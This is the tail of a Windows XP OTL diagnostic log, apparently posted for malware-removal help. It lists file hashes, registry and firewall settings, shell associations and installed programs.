[2010/04/16 08:02:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\TeamViewer
[2010/02/14 23:09:12 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\TP
[2010/02/28 15:47:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Unity
[2010/05/13 20:25:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\uTorrent
[2010/04/25 20:31:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\vfx
[2010/02/22 20:03:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Windows Search

[color=#E56717]========== Purity Check ==========[/color]



[color=#E56717]========== Custom Scans ==========[/color]


[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]


[color=#A23BEC]< MD5 for: AGP440.SYS  >[/color]
[2008/04/14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ERDNT\cache\agp440.sys
[2008/04/14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys
[2008/04/14 01:06:40 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys
[2004/08/04 00:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\agp440.sys

[color=#A23BEC]< MD5 for: AHCIX86.SYS  >[/color]
[2009/04/08 02:46:22 | 000,189,968 | ---- | M] (Advanced Micro Devices, Inc) MD5=3936A49ECB74CF23BBB6979CD683DD56 -- C:\WINDOWS\system32\drivers\ahcix86.sys

[color=#A23BEC]< MD5 for: ATAPI.SYS  >[/color]
[2008/04/14 01:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ERDNT\cache\atapi.sys
[2008/04/14 01:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/14 01:10:32 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/04 06:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys
[2004/08/04 06:00:00 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\atapi.sys

[color=#A23BEC]< MD5 for: EVENTLOG.DLL  >[/color]
[2010/01/27 00:59:08 | 000,028,797 | R--- | M] () MD5=486232DD9FDCAA3FF410E10BB0D0C5D4 -- C:\Perl\lib\auto\Win32\EventLog\EventLog.dll
[2008/04/14 06:41:54 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\ERDNT\cache\eventlog.dll
[2008/04/14 06:41:54 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\ServicePackFiles\i386\eventlog.dll
[2008/04/14 06:41:54 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=6D4FEB43EE538FC5428CC7F0565AA656 -- C:\WINDOWS\system32\eventlog.dll
[2004/08/04 06:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\$NtServicePackUninstall$\eventlog.dll
[2004/08/04 06:00:00 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=82B24CB70E5944E6E34662205A2A5B78 -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\eventlog.dll

[color=#A23BEC]< MD5 for: IASTOR.SYS  >[/color]
[2006/02/21 18:44:30 | 000,250,368 | ---- | M] (Intel Corporation) MD5=88B1943ECFF661F765228099138CF6AB -- C:\WINDOWS\dell\iastor\iastor.sys

[color=#A23BEC]< MD5 for: NETLOGON.DLL  >[/color]
[2008/04/14 06:42:02 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\ERDNT\cache\netlogon.dll
[2008/04/14 06:42:02 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\ServicePackFiles\i386\netlogon.dll
[2008/04/14 06:42:02 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=1B7F071C51B77C272875C3A23E1E4550 -- C:\WINDOWS\system32\netlogon.dll
[2009/02/06 14:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB968389\SP2QFE\netlogon.dll
[2009/02/06 14:46:09 | 000,408,064 | ---- | M] (Microsoft Corporation) MD5=6C476D33D82F1054849790181E8F7772 -- C:\WINDOWS\$hf_mig$\KB975467\SP2QFE\netlogon.dll
[2004/08/04 06:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\$NtServicePackUninstall$\netlogon.dll
[2004/08/04 06:00:00 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=96353FCECBA774BB8DA74A1C6507015A -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\netlogon.dll

[color=#A23BEC]< MD5 for: NVATABUS.SYS  >[/color]
[2006/03/16 20:51:32 | 000,099,840 | ---- | M] (NVIDIA Corporation) MD5=B7FB72492B753930EC70A0F49D04F12F -- C:\WINDOWS\dell\nvraid\NvAtaBus.sys
[2006/03/16 20:51:32 | 000,099,840 | ---- | M] (NVIDIA Corporation) MD5=B7FB72492B753930EC70A0F49D04F12F -- C:\WINDOWS\system32\drivers\NvAtaBus.sys

[color=#A23BEC]< MD5 for: SCECLI.DLL  >[/color]
[2004/08/04 06:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\$NtServicePackUninstall$\scecli.dll
[2004/08/04 06:00:00 | 000,180,224 | ---- | M] (Microsoft Corporation) MD5=0F78E27F563F2AAF74B91A49E2ABF19A -- C:\WINDOWS\SoftwareDistribution\Download\2d8407673ea9865ef7cd775540e3a36b\backup\scecli.dll
[2008/04/14 06:42:06 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\ERDNT\cache\scecli.dll
[2008/04/14 06:42:06 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\ServicePackFiles\i386\scecli.dll
[2008/04/14 06:42:06 | 000,181,248 | ---- | M] (Microsoft Corporation) MD5=A86BB5E61BF3E39B62AB4C7E7085A084 -- C:\WINDOWS\system32\scecli.dll

[color=#A23BEC]< MD5 for: SYMMPI.SYS  >[/color]
[2005/11/17 14:58:16 | 000,092,672 | ---- | M] (LSI Logic) MD5=1FD5249D5103125D2DA63F68D7BE1D35 -- C:\WINDOWS\dell\symmpi\symmpi.sys
[2005/11/17 14:58:16 | 000,092,672 | ---- | M] (LSI Logic) MD5=1FD5249D5103125D2DA63F68D7BE1D35 -- C:\WINDOWS\system32\drivers\symmpi.sys

[color=#A23BEC]< %systemroot%\*. /mp /s >[/color]

[color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color]
[2008/04/14 06:41:56 | 000,344,064 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b] -- C:\WINDOWS\system32\hnetcfg.dll
[4 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

[color=#A23BEC]< %systemroot%\Tasks\*.job /lockedfiles >[/color]

[color=#A23BEC]< %systemroot%\system32\drivers\*.sys /lockedfiles >[/color]
[2010/02/14 01:13:11 | 000,691,696 | ---- | M] ()[b] Unable to obtain MD5[/b] -- C:\WINDOWS\system32\drivers\sptd.sys

[color=#A23BEC]< %systemroot%\System32\config\*.sav >[/color]
[2010/02/12 16:46:28 | 000,094,208 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav
[2010/02/12 16:46:28 | 000,659,456 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav
[2010/02/12 16:46:28 | 000,942,080 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav

[color=#A23BEC]< %systemdrive%\*.sys /90 /md5 >[/color]
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () MD5=D41D8CD98F00B204E9800998ECF8427E -- C:\CONFIG.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () MD5=D41D8CD98F00B204E9800998ECF8427E -- C:\IO.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () MD5=D41D8CD98F00B204E9800998ECF8427E -- C:\MSDOS.SYS
[2010/05/13 16:57:47 | 2145,386,496 | -HS- | M] ()[b] Unable to obtain MD5[/b] -- C:\pagefile.sys

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 145 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:5B4BB726
< End of report >


Extras.txt:
CODE
OTL Extras logfile created on: 5/13/2010 8:32:43 PM - Run 1
OTL by OldTimer - Version 3.2.4.1     Folder = C:\Documents and Settings\Me\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

3.00 Gb Total Physical Memory | 2.00 Gb Available Physical Memory | 76.00% Memory free
5.00 Gb Paging File | 4.00 Gb Available in Paging File | 86.00% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 100.08 Gb Total Space | 72.00 Gb Free Space | 71.95% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded
Drive J: | 931.51 Gb Total Space | 19.51 Gb Free Space | 2.09% Space Free | Partition Type: NTFS

Computer Name: Mine
Current User Name: Me
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 90 Days
Output = Standard
Quick Scan

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.ini [@ = Notepad++_file] -- C:\Program Files\Notepad++\notepad++.exe (Don HO don.h@free.fr)
.txt [@ = Notepad++_file] -- C:\Program Files\Notepad++\notepad++.exe (Don HO don.h@free.fr)

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

[color=#E56717]========== Shell Spawning ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[color=#E56717]========== Security Center Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:*:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:*:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:*:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:*:Enabled:@xpsp2res.dll,-22002
"3389:TCP" = 3389:TCP:*:Disabled:@xpsp2res.dll,-22009

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
"3389:TCP" = 3389:TCP:*:Disabled:@xpsp2res.dll,-22009
"22:TCP" = 22:TCP:*:Disabled:SSH
"5800:TCP" = 5800:TCP:*:Disabled:VNC
"5900:TCP" = 5900:TCP:*:Disabled:Apple Remote Desktop

[color=#E56717]========== Authorized Applications List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Enabled:Windows Live Sync -- (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\GIGABYTE\GBTUpd\RunUpd.exe" = C:\Program Files\GIGABYTE\GBTUpd\RunUpd.exe:*:Enabled:RunUpd -- (Gigabyte)
"C:\Program Files\GIGABYTE\GBTUpd\GBTUpd.exe" = C:\Program Files\GIGABYTE\GBTUpd\GBTUpd.exe:*:Enabled:GBTUpd.exe -- (GIGABYTE)
"C:\Program Files\GIGABYTE\@BIOS\gwflash.exe" = C:\Program Files\GIGABYTE\@BIOS\gwflash.exe:*:Enabled:@BIOS Application -- ()
"C:\Program Files\uTorrent\uTorrent.exe" = C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent -- (BitTorrent, Inc.)
"C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe" = C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe:*:Enabled:Dropbox -- ()
"J:\Documents\John\ssh\Xming\Xming.exe" = J:\Documents\John\ssh\Xming\Xming.exe:*:Enabled:Xming X Server -- ()
"C:\WINDOWS\system32\javaw.exe" = C:\WINDOWS\system32\javaw.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Program Files\Java\jre6\bin\java.exe" = C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Program Files\Syslogd\Syslogd.exe" = C:\Program Files\Syslogd\Syslogd.exe:*:Enabled:Kiwi Syslog Server -- (Kiwi Enterprises)
"C:\Program Files\Java\jre6\bin\javaw.exe" = C:\Program Files\Java\jre6\bin\javaw.exe:*:Enabled:Java(TM) Platform SE binary -- (Sun Microsystems, Inc.)
"C:\Program Files\GIGABYTE\@BIOS\UpdExe.exe" = C:\Program Files\GIGABYTE\@BIOS\UpdExe.exe:*:Enabled:Exe File -- (GIGABYTE)
"C:\Program Files\GIGABYTE\@BIOS\GBTUpd.exe" = C:\Program Files\GIGABYTE\@BIOS\GBTUpd.exe:*:Enabled:GBTUpd.exe -- (GIGABYTE)
"C:\WINDOWS\system32\dpvsetup.exe" = C:\WINDOWS\system32\dpvsetup.exe:*:Disabled:Microsoft DirectPlay Voice Test -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" = C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE:*:Disabled:Microsoft Office OneNote -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" = C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE:*:Disabled:Microsoft Office Outlook -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office14\GROOVE.EXE" = C:\Program Files\Microsoft Office\Office14\GROOVE.EXE:*:Disabled:Microsoft SharePoint Workspace -- (Microsoft Corporation)
"C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Disabled:Windows Live Sync -- (Microsoft Corporation)


[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00C5F4F4-62F9-40D7-8000-AD8A9CD0C669}" = Microsoft Games for Windows - LIVE Redistributable
"{015C5B35-B678-451C-9AEE-821E8D69621C}_is1" = PeerBlock 1.0+ (r320)
"{0886900B-B2F3-452C-B580-60F1253F7F80}" = Native Instruments Controller Editor
"{0B8565BA-BAD5-4732-B122-5FD78EFC50A9}" = Native Instruments Service Center
"{0C826C5B-B131-423A-A229-C71B3CACCD6A}" = CDDRV_Installer
"{106F886B-A874-43DF-BCC4-01DB57E1F3C6}" = Windows Movie Maker 2 Winter Fun Pack
"{10CD364B-FFCC-48BE-B469-B9622A033075}" = Fences
"{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP620_series" = Canon MP620 series MP Drivers
"{121634B0-2F4B-11D3-ADA3-00C04F52DD52}" = Windows Installer Clean Up
"{12230A4C-6902-4001-B606-48C6FC98B42A}" = Thomas New Line
"{139E303E-1050-497F-98B1-9AE87B15C463}" = Windows Live Family Safety
"{178832DE-9DE0-4C87-9F82-9315A9B03985}" = Windows Live Writer
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{20140000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders  (English) 14 (Beta)
"{20140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010 (Beta)
"{20140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010 (Beta)
"{20140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010 (Beta)
"{20140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010 (Beta)
"{20140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010 (Beta)
"{20140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010 (Beta)
"{20140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010 (Beta)
"{20140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010 (Beta)
"{20140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010 (Beta)
"{20140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010 (Beta)
"{20140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010 (Beta)
"{20140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010 (Beta)
"{20140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010 (Beta)
"{20140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010 (Beta)
"{20140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010 (Beta)
"{20140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010 (Beta)
"{20140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010 (Beta)
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216018FF}" = Java(TM) 6 Update 20
"{27D0C7AB-59F1-4D4D-A0BB-05A31AC919EA}" = Windows XP Winter Fun Pack Screensavers
"{2930FB47-6452-4476-BF16-D77F748646DB}" = Native Instruments GuitarRig Mobile IO Driver
"{3101CB58-3482-4D21-AF1A-7057FC935355}" = KhalInstallWrapper
"{32A3A4F4-B792-11D6-A78A-00B0D0160180}" = Java(TM) SE Development Kit 6 Update 18
"{33BC9D7E-E790-495E-A4EA-CFB160C17A91}" = Logitech Gaming Software 5.08
"{342126E1-173C-4585-BFBE-3EBDD20E3E9E}" = Mobipocket Reader 6.2
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3C26E039-BE18-4B5E-A723-45390C451819}" = Windows XP Creativity Fun Packs - Windows Movie Maker 2 - Titles
"{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
"{485E6526-EA98-4F04-925A-67424D12E1E2}" = Windows XP Creativity Fun Packs - Windows XP Power Toys
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4E25C468-7745-4051-8B37-4A2C6635BA8B}" = Update Manager B09.0908.1
"{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}" = Photo Story 3 for Windows
"{55C09FC1-D2D8-495A-BD80-D6725F0DCA58}" = Logitech GamePanel Software 3.04.137
"{5684CDBB-5CB8-4E26-9F19-9DF037C143AC}" = Venue InterLok Driver Kit
"{5D95AD35-368F-47D5-B63A-A082DDF00119}" = Microsoft Digital Image Suite 2006 Editor
"{691F4068-81BF-49E3-B32E-FE3E16400119}" = Microsoft Digital Image Suite 2006 Library
"{6ADD0603-16EF-400D-9F9E-486432835002}" = OpenOffice.org 3.2
"{6DC0632A-A838-4B34-AC19-0FA18E1C533C}" = Sentinel Protection Installer 7.2.2
"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{77E6AE74-357C-4B33-8324-FDDC9997B4D1}" = Princess Magical Dress-Up
"{7930FB47-6452-4476-BF16-D77F748646DB}" = Native Instruments Session IO Driver
"{7E20EFE6-E604-48C6-8B39-BA4742F2CDB4}" = Zune Desktop Theme
"{81128EE8-8EAD-4DB0-85C6-17C2CE50FF71}" = Windows Live Essentials
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}" = Windows Live Sync
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8A74DEFD-A224-49CC-AB80-4E88BC730125}" = LogMeIn Hamachi
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{98613C99-1399-416C-A07C-1EE1C585D872}" = SeaTools for Windows
"{98FD8BB5-59A9-4163-883C-2997F7BB59D9}" = Microsoft Video Screensaver
"{9F7FC79B-3059-4264-9450-39EB368E3225}" = Microsoft Digital Image Library 9 - Blocker
"{A066194B-DC8F-449A-8E0F-B57BDD3A2072}" = SyncToy 2.1 (x86)
"{A1C962E2-2426-49C6-A38B-9A07E40D607C}" = Microsoft Games for Windows - LIVE
"{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A498D9EB-927B-459B-85D6-DD6EF8C2C564}" = erLT
"{A49F249F-0C91-497F-86DF-B2585E8E76B7}" = Microsoft Visual C++ 2005 Redistributable
"{A6264FF6-C49D-4533-AF42-4875C38BB24C}" = Windows XP Creativity Fun Packs - Windows Movie Maker 2 - Audio
"{AA468551-1794-42FE-B504-C41D75EEBDF2}_is1" = Partition Wizard Home Edition 5.0
"{B2DC3F08-2EB2-49A5-AA24-15DFC8B1CB83}" = @BIOS Ver.2.06
"{B962AD08-335F-46f7-A182-257D37672E5C}" = Native Instruments Rig Kontrol 3 Driver
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C151CE54-E7EA-4804-854B-F515368B0798}" = AMD Processor Driver
"{C7FAFC98-5ECC-40FC-B440-A5D5FE3A6A6E}" = Native Instruments Guitar Rig 4
"{C87BB591-A01B-47ED-AFD3-2B7169857F0F}" = Bob the Builder - Bob's Castle Adventure
"{C9BED750-1211-4480-B1A5-718A3BE15525}" = REALTEK GbE & FE Ethernet PCI-E NIC Driver
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D0F136FF-8BD5-4650-9E79-17162D30C12D}" = Windows XP Creativity Fun Packs - Digital Photography
"{D3A80508-CD83-4CA3-8671-914A1BC78B61}" = Microsoft Sync Framework 2.0 Provider Services (x86) ENU
"{D6C75F0B-3BC1-4FC9-B8C5-3F7E8ED059CA}" = Windows Live Photo Gallery
"{DB4F122C-02CB-4EBB-B283-D22F180EBD84}_is1" = D-Box 2.2
"{DEA314C4-0929-4250-BC92-98E4C105F28D}" = NVIDIA PhysX
"{E76FCE6B-9999-4250-8C75-B2DA4AD41268}" = Face_Wizard B09.0914.01
"{EB5F211D-85D5-44C4-BB15-1207C77EF430}" = Visual C++ 8.0 Runtime Setup Package
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F0E2B312-D7FD-4349-A9B6-E90B36DB1BD0}" = Paint.NET v3.5.5
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}" = Logitech SetPoint
"{F761359C-9CED-45AE-9A51-9D6605CD55C4}" = Evernote
